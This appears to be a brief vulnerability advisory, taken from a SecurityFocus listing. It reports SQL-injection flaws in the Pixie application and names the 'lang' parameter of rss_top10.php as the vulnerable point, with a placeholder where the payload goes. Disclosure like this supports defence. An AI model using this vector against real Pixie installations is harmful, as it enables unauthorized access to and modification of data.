
source: https://www.securityfocus.com/bid/46861/info Pixie is prone to multiple SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in an SQL query. A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database. http://www.example.com/rss/rss_top10.php?lang=[sqli]